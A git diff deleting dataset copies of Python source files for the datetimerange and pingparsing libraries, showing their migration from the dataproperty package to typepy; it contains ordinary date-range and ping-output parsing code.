- - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.is_intersection(x) - - .. parsed-literal:: - - True - """ - - import copy - - dtr = copy.deepcopy(self) - dtr.intersection(x) - - return dtr.is_set() - - def get_start_time_str(self): - """ - :return: - |attr_start_datetime| as |str| formatted with - |attr_start_time_format|. - Return |NaT| if invalid datetime or format. - :rtype: str - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.get_start_time_str() - time_range.start_time_format = "%Y/%m/%d %H:%M:%S" - print time_range.get_start_time_str() - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015/03/22 10:00:00 - """ - - try: - return self.start_datetime.strftime(self.start_time_format) - except AttributeError: - return self.NOT_A_TIME_STR - - def get_end_time_str(self): - """ - :return: - |attr_end_datetime| as a |str| formatted with - |attr_end_time_format|. - Return |NaT| if invalid datetime or format. - :rtype: str - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.get_end_time_str() - time_range.end_time_format = "%Y/%m/%d %H:%M:%S" - print time_range.get_end_time_str() - - .. parsed-literal:: - - 2015-03-22T10:10:00+0900 - 2015/03/22 10:10:00 - """ - - try: - return self.end_datetime.strftime(self.end_time_format) - except AttributeError: - return self.NOT_A_TIME_STR - - def get_timedelta_second(self): - """ - :return: (|attr_end_datetime| - |attr_start_datetime|) as seconds - :rtype: float - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.get_timedelta_second() - - .. parsed-literal:: - - 600.0 - """ - - return self.__get_timedelta_sec(self.timedelta) - - def set_start_datetime(self, value): - """ - Set the start time of the time range. - - :param datetime.datetime/str value: |param_start_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_start_datetime("2015-03-22T10:00:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - 2015-03-22T10:00:00+0900 - NaT - """ - - data_prop = dp.DataProperty( - value, strict_type_mapping=dp.NOT_STRICT_TYPE_MAPPING) - self.__validate_value(data_prop) - self.__start_datetime = data_prop.data - - def set_end_datetime(self, value): - """ - Set the end time of the time range. - - :param datetime.datetime/str value: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_end_datetime("2015-03-22T10:10:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - NaT - 2015-03-22T10:10:00+0900 - """ - - data_prop = dp.DataProperty( - value, strict_type_mapping=dp.NOT_STRICT_TYPE_MAPPING) - self.__validate_value(data_prop) - self.__end_datetime = data_prop.data - - def set_time_range(self, start, end): - """ - :param datetime.datetime/str start: |param_start_datetime| - :param datetime.datetime/str end: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 - """ - - self.set_start_datetime(start) - self.set_end_datetime(end) - - @staticmethod - def __compare_relativedelta(lhs, rhs): - if lhs.years < rhs.years: - return -1 - if lhs.years > rhs.years: - return 1 - - if lhs.months < rhs.months: - return -1 - if lhs.months > rhs.months: - return 1 - - if lhs.days < rhs.days: - return -1 - if lhs.days > rhs.days: - return 1 - - if lhs.hours < rhs.hours: - return -1 - if lhs.hours > rhs.hours: - return 1 - - if lhs.minutes < rhs.minutes: - return -1 - if lhs.minutes > rhs.minutes: - return 1 - - if lhs.seconds < rhs.seconds: - return -1 - if lhs.seconds > rhs.seconds: - return 1 - - if lhs.microseconds < rhs.microseconds: - return -1 - if lhs.microseconds > rhs.microseconds: - return 1 - - return 0 - - def __compare_timedelta(self, lhs, seconds): - try: - rhs = datetime.timedelta(seconds=seconds) - - if lhs < rhs: - return -1 - if lhs > rhs: - return 1 - - return 0 - except TypeError: - return self.__compare_relativedelta( - lhs.normalized(), rdelta.relativedelta(seconds=seconds)) - - def range(self, step): - """ - Return an iterator object. - - :param datetime.timedelta/dateutil.relativedelta.relativedelta step: - Step of iteration. - :return: iterator - :rtype: iterator - - :Examples: - - .. code:: python - - import datetime - from datetimerange import DateTimeRange - - time_range = DateTimeRange( - "2015-01-01T00:00:00+0900", "2015-01-04T00:00:00+0900") - for value in time_range.range(datetime.timedelta(days=1)): - print value - - .. parsed-literal:: - - 2015-01-01 00:00:00+09:00 - 2015-01-02 00:00:00+09:00 - 2015-01-03 00:00:00+09:00 - 2015-01-04 00:00:00+09:00 - """ - - if self.__compare_timedelta(step, 0) == 0: - raise ValueError("step must be not zero") - - is_inversion = False - try: - self.validate_time_inversion() - except ValueError: - is_inversion = True - - if not is_inversion: - if self.__compare_timedelta(step, seconds=0) < 0: - raise ValueError( - "invalid step: expect greater than 0, actual={}".format( - step)) - else: - if self.__compare_timedelta(step, seconds=0) > 0: - raise ValueError( - "invalid step: expect less than 0, actual={}".format( - step)) - - current_datetime = self.start_datetime - while current_datetime <= self.end_datetime: - yield current_datetime - current_datetime = current_datetime + step - - def intersection(self, x): - """ - Newly set a time range that overlaps - the input and the current time range. - - :param DateTimeRange x: - Value to compute intersection with the current time range. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.intersection(x) - time_range - - .. parsed-literal:: - - 2015-03-22T10:05:00+0900 - 2015-03-22T10:10:00+0900 - """ - - self.validate_time_inversion() - x.validate_time_inversion() - - if any([ - x.start_datetime in self, - self.start_datetime in x, - ]): - self.set_start_datetime(max(self.start_datetime, x.start_datetime)) - self.set_end_datetime(min(self.end_datetime, x.end_datetime)) - else: - self.set_start_datetime(None) - self.set_end_datetime(None) - - def encompass(self, x): - """ - Newly set a time range that encompasses - the input and the current time range. - - :param DateTimeRange x: - Value to compute encompass with the current time range. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.encompass(x) - time_range - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:15:00+0900 - """ - - self.validate_time_inversion() - x.validate_time_inversion() - - self.set_start_datetime(min(self.start_datetime, x.start_datetime)) - self.set_end_datetime(max(self.end_datetime, x.end_datetime)) - - def truncate(self, percentage): - """ - Truncate ``percentage`` / 2 [%] of whole time from first and last time. - - :param float percentage: Percentage of truncate. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.is_output_elapse = True - print time_range - time_range.truncate(10) - print time_range - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 (0:10:00) - 2015-03-22T10:00:30+0900 - 2015-03-22T10:09:30+0900 (0:09:00) - """ - - self.validate_time_inversion() - - if percentage < 0: - raise ValueError( - "discard_percent must be greater or equal to zero: " + - str(percentage)) - - if percentage == 0: - return - - discard_time = self.timedelta // int(100) * int(percentage / 2) - - self.__start_datetime += discard_time - self.__end_datetime -= discard_time - - def __validate_value(self, data_prop): - if data_prop.typecode not in [dp.Typecode.DATETIME, dp.Typecode.NONE]: - raise ValueError("invalid datetime value: {}".format(data_prop)) - - @staticmethod - def __get_timedelta_sec(dt): - return int( - dt.days * 60 ** 2 * 24 + float(dt.seconds) + - dt.microseconds / (1000.0 ** 2)) diff --git a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.target.py b/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.target.py deleted file mode 100644 index bea3fbc..0000000 --- a/v1/data/codefile/thombashi@datetimerange__936761f__datetimerange$__init__.py.target.py +++ /dev/null @@ -1,751 +0,0 @@ -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import division -from __future__ import unicode_literals - -import datetime - -import dateutil.parser -import typepy - -import dateutil.relativedelta as rdelta - - -class DateTimeRange(object): - """ - The class that represents the time range. - - :param datetime.datetime/str start: |param_start_datetime| - :param datetime.datetime/str end: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 - - .. py:attribute:: start_time_format - - Conversion format string for :py:attr:`.start_datetime`. - - .. seealso:: :py:meth:`.get_start_time_str` - - .. py:attribute:: end_time_format - - Conversion format string for :py:attr:`.end_datetime`. - - .. seealso:: :py:meth:`.get_end_time_str` - """ - - NOT_A_TIME_STR = "NaT" - - def __init__( - self, start_datetime=None, end_datetime=None, - start_time_format="%Y-%m-%dT%H:%M:%S%z", - end_time_format="%Y-%m-%dT%H:%M:%S%z"): - - self.set_time_range(start_datetime, end_datetime) - - self.start_time_format = start_time_format - self.end_time_format = end_time_format - - self.is_output_elapse = False - self.separator = " - " - - def __repr__(self): - text_list = [ - self.get_start_time_str(), - self.get_end_time_str(), - ] - - if self.is_output_elapse: - suffix = " ({})".format(self.end_datetime - self.start_datetime) - else: - suffix = "" - - return self.separator.join(text_list) + suffix - - def __eq__(self, other): - return all([ - self.start_datetime == other.start_datetime, - self.end_datetime == other.end_datetime, - ]) - - def __ne__(self, other): - return any([ - self.start_datetime != other.start_datetime, - self.end_datetime != other.end_datetime, - ]) - - def __add__(self, other): - return DateTimeRange( - self.start_datetime + other, self.end_datetime + other) - - def __iadd__(self, other): - self.set_start_datetime(self.start_datetime + other) - self.set_end_datetime(self.end_datetime + other) - - return self - - def __sub__(self, other): - return DateTimeRange( - self.start_datetime - other, self.end_datetime - other) - - def __isub__(self, other): - self.set_start_datetime(self.start_datetime - other) - self.set_end_datetime(self.end_datetime - other) - - return self - - def __contains__(self, x): - """ - :param datetime.datetime/str x: - datetime or datetimerange to compare. - Parse and convert to datetime if the value type is ``str``. - :return: |True| if the ``x`` is within the time range - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print "2015-03-22T10:05:00+0900" in time_range - print "2015-03-22T10:15:00+0900" in time_range - time_range_smaller = DateTimeRange( - "2015-03-22T10:03:00+0900", "2015-03-22T10:07:00+0900") - print time_range_smaller in time_range - - .. parsed-literal:: - - True - False - - .. seealso:: - - :py:meth:`.validate_time_inversion` - """ - - self.validate_time_inversion() - - if isinstance(x, DateTimeRange): - return x.start_datetime >= self.start_datetime and x.end_datetime <= self.end_datetime - - try: - value = dateutil.parser.parse(x) - except (TypeError, AttributeError): - value = x - - return self.start_datetime <= value <= self.end_datetime - - @property - def start_datetime(self): - """ - :return: Start time of the time range. - :rtype: datetime.datetime - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.start_datetime - - .. parsed-literal:: - - datetime.datetime(2015, 3, 22, 10, 0, tzinfo=tzoffset(None, 32400)) - """ - - return self.__start_datetime - - @property - def end_datetime(self): - """ - :return: End time of the time range. - :rtype: datetime.datetime - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.end_datetime - - .. parsed-literal:: - - datetime.datetime(2015, 3, 22, 10, 10, tzinfo=tzoffset(None, 32400)) - """ - - return self.__end_datetime - - @property - def timedelta(self): - """ - :return: - (|attr_end_datetime| - |attr_start_datetime|) as |timedelta| - :rtype: datetime.timedelta - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.timedelta - - .. parsed-literal:: - - datetime.timedelta(0, 600) - """ - - return self.end_datetime - self.start_datetime - - def is_set(self): - """ - :return: - |True| if both |attr_start_datetime| and - |attr_end_datetime| were not |None|. - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range.is_set() - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_set() - - .. parsed-literal:: - - False - True - """ - - return all([ - self.start_datetime is not None, - self.end_datetime is not None, - ]) - - def validate_time_inversion(self): - """ - Check time inversion of the time range. - - :raises ValueError: - If |attr_start_datetime| is - bigger than |attr_end_datetime|. - :raises TypeError: - Any one of |attr_start_datetime| and |attr_end_datetime|, - or both is inappropriate datetime value. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:10:00+0900", "2015-03-22T10:00:00+0900") - try: - time_range.validate_time_inversion() - except ValueError: - print "time inversion" - - .. parsed-literal:: - - time inversion - """ - - if not self.is_set(): - # for python2/3 compatibility - raise TypeError - - if self.start_datetime > self.end_datetime: - message = "time inversion found: {:s} > {:s}".format( - str(self.start_datetime), str(self.end_datetime)) - raise ValueError(message) - - def is_valid_timerange(self): - """ - :return: - |True| if the time range is - not null and not time inversion. - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range.is_valid_timerange() - time_range.set_time_range( - "2015-03-22T10:20:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_valid_timerange() - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.is_valid_timerange() - - .. parsed-literal:: - - False - False - True - - .. seealso:: - - :py:meth:`.is_set` - :py:meth:`.validate_time_inversion` - """ - - try: - self.validate_time_inversion() - except (TypeError, ValueError): - return False - - return self.is_set() - - def is_intersection(self, x): - """ - :param DateTimeRange x: Value to compare - :return: |True| if intersect with ``x`` - :rtype: bool - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.is_intersection(x) - - .. parsed-literal:: - - True - """ - - import copy - - dtr = copy.deepcopy(self) - dtr.intersection(x) - - return dtr.is_set() - - def get_start_time_str(self): - """ - :return: - |attr_start_datetime| as |str| formatted with - |attr_start_time_format|. - Return |NaT| if invalid datetime or format. - :rtype: str - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.get_start_time_str() - time_range.start_time_format = "%Y/%m/%d %H:%M:%S" - print time_range.get_start_time_str() - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015/03/22 10:00:00 - """ - - try: - return self.start_datetime.strftime(self.start_time_format) - except AttributeError: - return self.NOT_A_TIME_STR - - def get_end_time_str(self): - """ - :return: - |attr_end_datetime| as a |str| formatted with - |attr_end_time_format|. - Return |NaT| if invalid datetime or format. - :rtype: str - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range.get_end_time_str() - time_range.end_time_format = "%Y/%m/%d %H:%M:%S" - print time_range.get_end_time_str() - - .. parsed-literal:: - - 2015-03-22T10:10:00+0900 - 2015/03/22 10:10:00 - """ - - try: - return self.end_datetime.strftime(self.end_time_format) - except AttributeError: - return self.NOT_A_TIME_STR - - def get_timedelta_second(self): - """ - :return: (|attr_end_datetime| - |attr_start_datetime|) as seconds - :rtype: float - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.get_timedelta_second() - - .. parsed-literal:: - - 600.0 - """ - - return self.__get_timedelta_sec(self.timedelta) - - def set_start_datetime(self, value): - """ - Set the start time of the time range. - - :param datetime.datetime/str value: |param_start_datetime| - :raises ValueError: If the value is invalid as a datetime value. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_start_datetime("2015-03-22T10:00:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - 2015-03-22T10:00:00+0900 - NaT - """ - - if value is None: - self.__start_datetime = None - return - - try: - self.__start_datetime = typepy.type.DateTime( - value, strict_level=typepy.StrictLevel.MIN).convert() - except typepy.TypeConversionError as e: - raise ValueError(e) - - def set_end_datetime(self, value): - """ - Set the end time of the time range. - - :param datetime.datetime/str value: |param_end_datetime| - :raises ValueError: If the value is invalid as a datetime value. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_end_datetime("2015-03-22T10:10:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - NaT - 2015-03-22T10:10:00+0900 - """ - - if value is None: - self.__end_datetime = None - return - - try: - self.__end_datetime = typepy.type.DateTime( - value, strict_level=typepy.StrictLevel.MIN).convert() - except typepy.TypeConversionError as e: - raise ValueError(e) - - def set_time_range(self, start, end): - """ - :param datetime.datetime/str start: |param_start_datetime| - :param datetime.datetime/str end: |param_end_datetime| - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange() - print time_range - time_range.set_time_range( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - print time_range - - .. parsed-literal:: - - NaT - NaT - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 - """ - - self.set_start_datetime(start) - self.set_end_datetime(end) - - @staticmethod - def __compare_relativedelta(lhs, rhs): - if lhs.years < rhs.years: - return -1 - if lhs.years > rhs.years: - return 1 - - if lhs.months < rhs.months: - return -1 - if lhs.months > rhs.months: - return 1 - - if lhs.days < rhs.days: - return -1 - if lhs.days > rhs.days: - return 1 - - if lhs.hours < rhs.hours: - return -1 - if lhs.hours > rhs.hours: - return 1 - - if lhs.minutes < rhs.minutes: - return -1 - if lhs.minutes > rhs.minutes: - return 1 - - if lhs.seconds < rhs.seconds: - return -1 - if lhs.seconds > rhs.seconds: - return 1 - - if lhs.microseconds < rhs.microseconds: - return -1 - if lhs.microseconds > rhs.microseconds: - return 1 - - return 0 - - def __compare_timedelta(self, lhs, seconds): - try: - rhs = datetime.timedelta(seconds=seconds) - - if lhs < rhs: - return -1 - if lhs > rhs: - return 1 - - return 0 - except TypeError: - return self.__compare_relativedelta( - lhs.normalized(), rdelta.relativedelta(seconds=seconds)) - - def range(self, step): - """ - Return an iterator object. - - :param datetime.timedelta/dateutil.relativedelta.relativedelta step: - Step of iteration. - :return: iterator - :rtype: iterator - - :Examples: - - .. code:: python - - import datetime - from datetimerange import DateTimeRange - - time_range = DateTimeRange( - "2015-01-01T00:00:00+0900", "2015-01-04T00:00:00+0900") - for value in time_range.range(datetime.timedelta(days=1)): - print value - - .. parsed-literal:: - - 2015-01-01 00:00:00+09:00 - 2015-01-02 00:00:00+09:00 - 2015-01-03 00:00:00+09:00 - 2015-01-04 00:00:00+09:00 - """ - - if self.__compare_timedelta(step, 0) == 0: - raise ValueError("step must be not zero") - - is_inversion = False - try: - self.validate_time_inversion() - except ValueError: - is_inversion = True - - if not is_inversion: - if self.__compare_timedelta(step, seconds=0) < 0: - raise ValueError( - "invalid step: expect greater than 0, actual={}".format( - step)) - else: - if self.__compare_timedelta(step, seconds=0) > 0: - raise ValueError( - "invalid step: expect less than 0, actual={}".format( - step)) - - current_datetime = self.start_datetime - while current_datetime <= self.end_datetime: - yield current_datetime - current_datetime = current_datetime + step - - def intersection(self, x): - """ - Newly set a time range that overlaps - the input and the current time range. - - :param DateTimeRange x: - Value to compute intersection with the current time range. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.intersection(x) - time_range - - .. parsed-literal:: - - 2015-03-22T10:05:00+0900 - 2015-03-22T10:10:00+0900 - """ - - self.validate_time_inversion() - x.validate_time_inversion() - - if any([ - x.start_datetime in self, - self.start_datetime in x, - ]): - self.set_start_datetime(max(self.start_datetime, x.start_datetime)) - self.set_end_datetime(min(self.end_datetime, x.end_datetime)) - else: - self.set_start_datetime(None) - self.set_end_datetime(None) - - def encompass(self, x): - """ - Newly set a time range that encompasses - the input and the current time range. - - :param DateTimeRange x: - Value to compute encompass with the current time range. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - x = DateTimeRange( - "2015-03-22T10:05:00+0900", "2015-03-22T10:15:00+0900") - time_range.encompass(x) - time_range - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:15:00+0900 - """ - - self.validate_time_inversion() - x.validate_time_inversion() - - self.set_start_datetime(min(self.start_datetime, x.start_datetime)) - self.set_end_datetime(max(self.end_datetime, x.end_datetime)) - - def truncate(self, percentage): - """ - Truncate ``percentage`` / 2 [%] of whole time from first and last time. - - :param float percentage: Percentage of truncate. - - :Examples: - - .. code:: python - - from datetimerange import DateTimeRange - time_range = DateTimeRange( - "2015-03-22T10:00:00+0900", "2015-03-22T10:10:00+0900") - time_range.is_output_elapse = True - print time_range - time_range.truncate(10) - print time_range - - .. parsed-literal:: - - 2015-03-22T10:00:00+0900 - 2015-03-22T10:10:00+0900 (0:10:00) - 2015-03-22T10:00:30+0900 - 2015-03-22T10:09:30+0900 (0:09:00) - """ - - self.validate_time_inversion() - - if percentage < 0: - raise ValueError( - "discard_percent must be greater or equal to zero: " + - str(percentage)) - - if percentage == 0: - return - - discard_time = self.timedelta // int(100) * int(percentage / 2) - - self.__start_datetime += discard_time - self.__end_datetime -= discard_time - - def __validate_value(self, data_prop): - if data_prop.typecode not in [dp.Typecode.DATETIME, dp.Typecode.NONE]: - raise ValueError("invalid datetime value: {}".format(data_prop)) - - @staticmethod - def __get_timedelta_sec(dt): - return int( - dt.days * 60 ** 2 * 24 + float(dt.seconds) + - dt.microseconds / (1000.0 ** 2)) diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.diff b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.diff deleted file mode 100644 index bd7adf1..0000000 --- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.diff +++ /dev/null @@ -1,57 +0,0 @@ -diff --git a/pingparsing/_pingparsing.py b/pingparsing/_pingparsing.py - index 0b98aff8724ef994311f48b983bd411344463e4c..45fac3cb38661f80fc8bd129ce633cfd15423835 100644 - --- a/pingparsing/_pingparsing.py - +++ b/pingparsing/_pingparsing.py -@@ -5,13 +5,14 @@ - """ - - from __future__ import absolute_import -+ - import re - --import dataproperty -+import typepy - import pyparsing as pp - --from .error import PingStaticticsHeaderNotFoundError - from .error import EmptyPingStaticticsError -+from .error import PingStaticticsHeaderNotFoundError - - - def _to_unicode(text): -@@ -131,7 +132,7 @@ class PingParsing(object): - - self.__initialize_parse_result() - -- if dataproperty.is_empty_string(ping_message): -+ if typepy.is_null_string(ping_message): - return - - try: -@@ -153,7 +154,7 @@ class PingParsing(object): - return i - - def __validate_stats_body(self, body_line_list): -- if dataproperty.is_empty_sequence(body_line_list): -+ if typepy.is_empty_sequence(body_line_list): - raise EmptyPingStaticticsError("ping statistics is empty") - - def __parse_windows_ping(self, ping_message): -@@ -183,7 +184,7 @@ class PingParsing(object): - rtt_line = body_line_list[2].strip() - except IndexError: - return -- if dataproperty.is_empty_string(rtt_line): -+ if typepy.is_null_string(rtt_line): - return - rtt_pattern = ( - pp.Literal("Minimum = ") + -@@ -230,7 +231,7 @@ class PingParsing(object): - rtt_line = body_line_list[1] - except IndexError: - return -- if dataproperty.is_empty_string(rtt_line): -+ if typepy.is_null_string(rtt_line): - return - - rtt_pattern = ( diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.source.py b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.source.py deleted file mode 100644 index 8154e1f..0000000 --- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingparsing.py.source.py +++ /dev/null @@ -1,261 +0,0 @@ -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import -import re - -import dataproperty -import pyparsing as pp - -from .error import PingStaticticsHeaderNotFoundError -from .error import EmptyPingStaticticsError - - -def _to_unicode(text): - try: - return text.decode("ascii") - except AttributeError: - return text - - -class PingParsing(object): - """ - Parser class to parsing ping command output. - """ - - def __init__(self): - self.destination_host = "" - self.ping_option = "" - - self.__initialize_parse_result() - - @property - def packet_transmit(self): - """ - :return: Number of packets transmitted. - :rtype: int - """ - - return self.__packet_transmit - - @property - def packet_receive(self): - """ - :return: Number of packets received. - :rtype: int - """ - - return self.__packet_receive - - @property - def packet_loss(self): - """ - :return: Percentage of packet loss [%]. - :rtype: float - """ - - return self.__packet_loss - - @property - def rtt_min(self): - """ - :return: Minimum round trip time of transmitted ICMP packets [ms]. - :rtype: float - """ - - return self.__rtt_min - - @property - def rtt_avg(self): - """ - :return: Average round trip time of transmitted ICMP packets [ms]. - :rtype: float - """ - - return self.__rtt_avg - - @property - def rtt_max(self): - """ - :return: Maximum round trip time of transmitted ICMP packets [ms]. - :rtype: float - """ - - return self.__rtt_max - - @property - def rtt_mdev(self): - """ - :return: Standard deviation of transmitted ICMP packets (Linux only). - :rtype: float - """ - - return self.__rtt_mdev - - def as_dict(self): - """ - :return: Parsed result as a dictionary. - :rtype: dict - """ - - return { - "packet_transmit": self.packet_transmit, - "packet_receive": self.packet_receive, - "packet_loss": self.packet_loss, - "rtt_min": self.rtt_min, - "rtt_avg": self.rtt_avg, - "rtt_max": self.rtt_max, - "rtt_mdev": self.rtt_mdev, - } - - def parse(self, ping_message): - """ - Parse ping command output. - You can get parsing results by attributes: - - - :py:attr:`.packet_transmit` - - :py:attr:`.packet_receive` - - :py:attr:`.packet_loss` - - :py:attr:`.rtt_min` - - :py:attr:`.rtt_avg` - - :py:attr:`.rtt_max` - - :py:attr:`.rtt_mdev` - - Or you can get as a dictionary by :py:meth:`.as_dict` - - :param str ping_message: String of ping command output. - """ - - self.__initialize_parse_result() - - if dataproperty.is_empty_string(ping_message): - return - - try: - self.__parse_linux_ping(ping_message) - return - except PingStaticticsHeaderNotFoundError: - pass - - self.__parse_windows_ping(ping_message) - - def __find_ststs_head_line_idx(self, line_list, re_stats_header): - for i, line in enumerate(line_list): - if re_stats_header.search(line): - break - else: - raise PingStaticticsHeaderNotFoundError( - "ping statistics not found") - - return i - - def __validate_stats_body(self, body_line_list): - if dataproperty.is_empty_sequence(body_line_list): - raise EmptyPingStaticticsError("ping statistics is empty") - - def __parse_windows_ping(self, ping_message): - line_list = _to_unicode(ping_message).splitlines() - - i = self.__find_ststs_head_line_idx( - line_list, re.compile("^Ping statistics for ")) - - body_line_list = line_list[i + 1:] - self.__validate_stats_body(body_line_list) - packet_line = body_line_list[0].strip() - packet_pattern = ( - pp.Literal("Packets: Sent = ") + - pp.Word(pp.nums) + - pp.Literal(", Received = ") + - pp.Word(pp.nums) + - pp.Literal(", Lost = ") + - pp.Word(pp.nums) + "(" + - pp.Word(pp.nums + ".") - ) - parse_list = packet_pattern.parseString(_to_unicode(packet_line)) - self.__packet_transmit = int(parse_list[1]) - self.__packet_receive = int(parse_list[3]) - self.__packet_loss = float(parse_list[7]) - - try: - rtt_line = body_line_list[2].strip() - except IndexError: - return - if dataproperty.is_empty_string(rtt_line): - return - rtt_pattern = ( - pp.Literal("Minimum = ") + - pp.Word(pp.nums) + - pp.Literal("ms, Maximum = ") + - pp.Word(pp.nums) + - pp.Literal("ms, Average = ") + - pp.Word(pp.nums) - ) - try: - parse_list = rtt_pattern.parseString(_to_unicode(rtt_line)) - except pp.ParseBaseException: - return - - self.__rtt_min = float(parse_list[1]) - self.__rtt_avg = float(parse_list[5]) - self.__rtt_max = float(parse_list[3]) - - def __parse_linux_ping(self, ping_message): - line_list = _to_unicode(ping_message).splitlines() - - i = self.__find_ststs_head_line_idx( - line_list, re.compile("--- .* ping statistics ---")) - - body_line_list = line_list[i + 1:] - self.__validate_stats_body(body_line_list) - - packet_line = body_line_list[0] - packet_pattern = ( - pp.Word(pp.nums) + - pp.Literal("packets transmitted,") + - pp.Word(pp.nums) + - pp.Literal("received,") + - pp.SkipTo(pp.Word(pp.nums + ".%") + pp.Literal("packet loss")) + - pp.Word(pp.nums + ".") + - pp.Literal("% packet loss") - ) - parse_list = packet_pattern.parseString(_to_unicode(packet_line)) - self.__packet_transmit = int(parse_list[0]) - self.__packet_receive = int(parse_list[2]) - self.__packet_loss = float(parse_list[-2]) - - try: - rtt_line = body_line_list[1] - except IndexError: - return - if dataproperty.is_empty_string(rtt_line): - return - 